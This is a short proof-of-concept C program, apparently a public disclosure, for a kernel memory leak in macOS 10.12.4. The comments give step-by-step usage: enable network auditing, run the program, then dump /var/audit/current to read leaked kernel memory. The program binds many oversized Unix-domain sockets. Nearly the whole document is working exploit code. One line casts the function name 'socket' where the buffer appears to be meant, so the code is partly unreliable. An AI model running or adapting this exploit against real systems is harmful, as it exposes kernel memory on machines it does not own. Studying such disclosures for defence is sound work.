macOS 10.12.4 0day kernel memory leak PoC

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <sys/un.h>
5. #include <unistd.h>
6. #include <sys/types.h>
7. #include <sys/socket.h>
8.  
9. /*
10.  
11. macOS 10.12.4 0day kernel memory leak PoC (see: https://objective-see.com/blog/blog_0x1B.html)
12. tl;dr Apple 'fixed' a bug by #1 not fixing it, #2 introducing a kernel memory leak ¯\_(ツ)_/¯
13.  
14. #1 enable (network) auditing:
15. a) add 'nt' to /etc/security/audit_control: flags:lo,aa,nt
16. or
17. b) read directly off /dev/auditpipe (after configuring it with AUDIT_CLASS_NETWORK)
18.  
19. #2 run this program
20.  
21. #3 dump the audit log, /var/audit/current, to view leaked kernel memory
22.  
23. note: r00t is required for #1 && #3, so impact of this bug is limited
24.  
25. */
26.  
27. int main(int argc, char*argv[])
28. {
29. //make a bunch of sockets
30. for(int i=0; i<100; i++)
31. {
32. //random size [128 - 256]
33. int size = arc4random_uniform(128)+128;
34.  
35. //alloc/set buffer
36. char* unixSocket = malloc(size);
37. memset(unixSocket, 0x41, size);
38.  
39. //init
40. ((struct sockaddr_un*)unixSocket)->sun_len = size;
41. ((struct sockaddr_un*)unixSocket)->sun_family = AF_UNIX;
42.  
43. //unlink/bind
44. unlink(((struct sockaddr_un*)socket)->sun_path);
45. bind(socket(AF_UNIX, SOCK_STREAM, 0), (struct sockaddr *)unixSocket, size);
46. }
47.  
48. return 0;
49. }